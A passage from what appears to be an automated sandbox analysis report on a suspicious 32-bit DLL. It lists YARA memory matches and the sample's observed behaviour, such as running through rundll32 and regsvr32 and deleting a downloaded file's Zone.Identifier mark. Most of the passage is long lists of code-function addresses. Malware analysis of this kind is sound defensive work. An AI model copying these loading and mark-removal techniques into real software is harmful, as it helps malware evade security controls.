                      Source: Yara matchFile source: 00000007.00000002.264146263.0000000004691000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.264222347.00000000047C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.774216836.0000000000B50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.777836240.0000000004D81000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.263454210.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.777801455.0000000004D50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.304925939.00000000051B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.779081718.0000000005531000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.264062913.0000000004571000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.773825240.0000000000AD0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.304079394.00000000030F1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.287008332.0000000002F51000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.315220757.0000000001500000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.778524005.0000000005200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.778353822.0000000005120000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.778061174.0000000004F10000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.778216857.0000000005031000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.265146904.0000000004C31000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.265087151.0000000004AD0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.778826105.0000000005400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.779165292.0000000005560000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.778104537.0000000004F41000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.254208432.0000000004741000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.264280922.0000000004820000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.263561510.0000000000C21000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.779010821.0000000005500000.00000040.00000001.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Source: xxWrY2YG7s.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6472 -ip 6472
                      Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\SysWOW64\Bcdsqhgufomb\pnioy.zya:Zone.IdentifierJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Ynbglcmtebwefkh\Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F6EFDD0_2_02F6EFDD
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F6BEFD0_2_02F6BEFD
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F6E4E50_2_02F6E4E5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F700EF0_2_02F700EF
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F5F0E90_2_02F5F0E9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F73EE90_2_02F73EE9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F6CAD50_2_02F6CAD5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F6D8DB0_2_02F6D8DB
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F6CCD90_2_02F6CCD9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F580C00_2_02F580C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F746BD0_2_02F746BD
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F60EBC0_2_02F60EBC
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F60ABA0_2_02F60ABA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F5C6B80_2_02F5C6B8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F6A2A50_2_02F6A2A5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F51CA10_2_02F51CA1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F63EAA0_2_02F63EAA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F5BAA90_2_02F5BAA9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F736AA0_2_02F736AA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F5DE740_2_02F5DE74
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F6A4740_2_02F6A474
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F5A8710_2_02F5A871
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F6DC710_2_02F6DC71
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F57E790_2_02F57E79
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F570780_2_02F57078
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F6567B0_2_02F6567B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F64A660_2_02F64A66
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F70A640_2_02F70A64
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F732630_2_02F73263
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F6B2570_2_02F6B257
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F62E5D0_2_02F62E5D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F5A4450_2_02F5A445
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F642440_2_02F64244
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F5E6400_2_02F5E640
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F6F8400_2_02F6F840
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F574420_2_02F57442
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F586360_2_02F58636
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F534310_2_02F53431
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F5B8200_2_02F5B820
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F688060_2_02F68806
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F69A010_2_02F69A01
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F67A0F0_2_02F67A0F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F720090_2_02F72009
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F607F40_2_02F607F4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F69DF50_2_02F69DF5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F685FF0_2_02F685FF
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F54BFC0_2_02F54BFC
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F555FF0_2_02F555FF
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F6E1F80_2_02F6E1F8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F627F90_2_02F627F9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F667E60_2_02F667E6
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F6C5D50_2_02F6C5D5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F6FBDE0_2_02F6FBDE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F5E7DE0_2_02F5E7DE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F5C5D80_2_02F5C5D8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F6D1BC0_2_02F6D1BC
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F717BD0_2_02F717BD
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F5BFBE0_2_02F5BFBE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F557B80_2_02F557B8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F577A30_2_02F577A3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F68FAE0_2_02F68FAE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F707AA0_2_02F707AA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F521940_2_02F52194
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F60F860_2_02F60F86
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F661870_2_02F66187
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F63D850_2_02F63D85
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F5238C0_2_02F5238C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F5FB8E0_2_02F5FB8E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F64F740_2_02F64F74
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F697740_2_02F69774
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F6437A0_2_02F6437A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F6017B0_2_02F6017B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F657790_2_02F65779
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F56B7A0_2_02F56B7A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F5F3690_2_02F5F369
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F6E9550_2_02F6E955
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F72D530_2_02F72D53
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F67D5B0_2_02F67D5B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F6FF580_2_02F6FF58
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F621420_2_02F62142
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F5D14C0_2_02F5D14C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F6654A0_2_02F6654A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F653330_2_02F65333
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F68D3D0_2_02F68D3D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F51F380_2_02F51F38
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F655150_2_02F65515
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F5EF0C0_2_02F5EF0C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F72B090_2_02F72B09
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F5670B0_2_02F5670B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F6AD080_2_02F6AD08
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100200112_2_10020011
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100181CA2_2_100181CA
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1001929D2_2_1001929D
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1002542D2_2_1002542D
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100274AE2_2_100274AE
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100265752_2_10026575
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1001869D2_2_1001869D
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100168602_2_10016860
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1002596F2_2_1002596F
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10022A5C2_2_10022A5C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10018A712_2_10018A71
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1001AAB72_2_1001AAB7
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1001CB162_2_1001CB16
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10018E7D2_2_10018E7D
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10025EB12_2_10025EB1
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E785FF2_2_00E785FF
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E7EFDD2_2_00E7EFDD
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E800EF2_2_00E800EF
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E6F0E92_2_00E6F0E9
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E680C02_2_00E680C0
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E7D8DB2_2_00E7D8DB
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E6A8712_2_00E6A871
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E670782_2_00E67078
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E7F8402_2_00E7F840
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E6B8202_2_00E6B820
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E820092_2_00E82009
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E788062_2_00E78806
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E7E1F82_2_00E7E1F8
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E7D1BC2_2_00E7D1BC
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E761872_2_00E76187
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E621942_2_00E62194
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E7017B2_2_00E7017B
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E721422_2_00E72142
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E6D14C2_2_00E6D14C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E7E9552_2_00E7E955
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E7CAD52_2_00E7CAD5
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E7A2A52_2_00E7A2A5
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E6BAA92_2_00E6BAA9
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E70ABA2_2_00E70ABA
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E74A662_2_00E74A66
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E832632_2_00E83263
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E80A642_2_00E80A64
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E742442_2_00E74244
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E7B2572_2_00E7B257
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E79A012_2_00E79A01
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E77A0F2_2_00E77A0F
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E64BFC2_2_00E64BFC
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E7FBDE2_2_00E7FBDE
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E6FB8E2_2_00E6FB8E
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E6238C2_2_00E6238C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E6F3692_2_00E6F369
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E66B7A2_2_00E66B7A
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E7437A2_2_00E7437A
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E753332_2_00E75333
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E82B092_2_00E82B09
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E7E4E52_2_00E7E4E5
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E7CCD92_2_00E7CCD9
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E61CA12_2_00E61CA1
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E7A4742_2_00E7A474
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E7DC712_2_00E7DC71
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E6A4452_2_00E6A445
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E674422_2_00E67442
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E634312_2_00E63431
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E79DF52_2_00E79DF5
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E655FF2_2_00E655FF
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E7C5D52_2_00E7C5D5
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E6C5D82_2_00E6C5D8
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E73D852_2_00E73D85
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E7654A2_2_00E7654A
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E82D532_2_00E82D53
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E77D5B2_2_00E77D5B
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E78D3D2_2_00E78D3D
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E7AD082_2_00E7AD08
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E755152_2_00E75515
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E83EE92_2_00E83EE9
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E7BEFD2_2_00E7BEFD
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E836AA2_2_00E836AA
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E73EAA2_2_00E73EAA
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E846BD2_2_00E846BD
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E70EBC2_2_00E70EBC
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E6C6B82_2_00E6C6B8
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E6DE742_2_00E6DE74
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E7567B2_2_00E7567B
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E67E792_2_00E67E79
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E6E6402_2_00E6E640
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E72E5D2_2_00E72E5D
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E686362_2_00E68636
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E767E62_2_00E767E6
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E707F42_2_00E707F4
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E727F92_2_00E727F9
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E6E7DE2_2_00E6E7DE
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E807AA2_2_00E807AA
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E677A32_2_00E677A3
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E78FAE2_2_00E78FAE
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E817BD2_2_00E817BD
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E6BFBE2_2_00E6BFBE
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E657B82_2_00E657B8
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E70F862_2_00E70F86
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E74F742_2_00E74F74
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E797742_2_00E79774
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E757792_2_00E75779
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E7FF582_2_00E7FF58
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E61F382_2_00E61F38
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E6EF0C2_2_00E6EF0C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00E6670B2_2_00E6670B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100200113_2_10020011
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100181CA3_2_100181CA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001929D3_2_1001929D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002542D3_2_1002542D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100274AE3_2_100274AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100265753_2_10026575
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001869D3_2_1001869D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001178A3_2_1001178A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100168603_2_10016860
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002596F3_2_1002596F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10022A5C3_2_10022A5C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10018A713_2_10018A71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001AAB73_2_1001AAB7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001CB163_2_1001CB16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10018E7D3_2_10018E7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10025EB13_2_10025EB1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047585FF3_2_047585FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0475EFDD3_2_0475EFDD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0475A4743_2_0475A474
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0475DC713_2_0475DC71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0474A4453_2_0474A445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047474423_2_04747442
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047434313_2_04743431
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0475E4E53_2_0475E4E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0475CCD93_2_0475CCD9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04741CA13_2_04741CA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04762D533_2_04762D53
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04757D5B3_2_04757D5B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0475654A3_2_0475654A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04758D3D3_2_04758D3D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047555153_2_04755515
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0475AD083_2_0475AD08
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04759DF53_2_04759DF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047455FF3_2_047455FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0475C5D53_2_0475C5D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0474C5D83_2_0474C5D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04753D853_2_04753D85
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0474DE743_2_0474DE74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04747E793_2_04747E79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0475567B3_2_0475567B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04752E5D3_2_04752E5D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0474E6403_2_0474E640
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047486363_2_04748636
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0475BEFD3_2_0475BEFD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04763EE93_2_04763EE9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04750EBC3_2_04750EBC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047646BD3_2_047646BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0474C6B83_2_0474C6B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047636AA3_2_047636AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04753EAA3_2_04753EAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04754F743_2_04754F74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047597743_2_04759774
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047557793_2_04755779
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0475FF583_2_0475FF58
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04741F383_2_04741F38
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0474EF0C3_2_0474EF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0474670B3_2_0474670B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047507F43_2_047507F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047527F93_2_047527F9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047567E63_2_047567E6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0474E7DE3_2_0474E7DE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0474BFBE3_2_0474BFBE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047617BD3_2_047617BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047457B83_2_047457B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047477A33_2_047477A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04758FAE3_2_04758FAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047607AA3_2_047607AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04750F863_2_04750F86
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0474A8713_2_0474A871
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047470783_2_04747078
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0475F8403_2_0475F840
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0474B8203_2_0474B820
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047588063_2_04758806
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_047620093_2_04762009
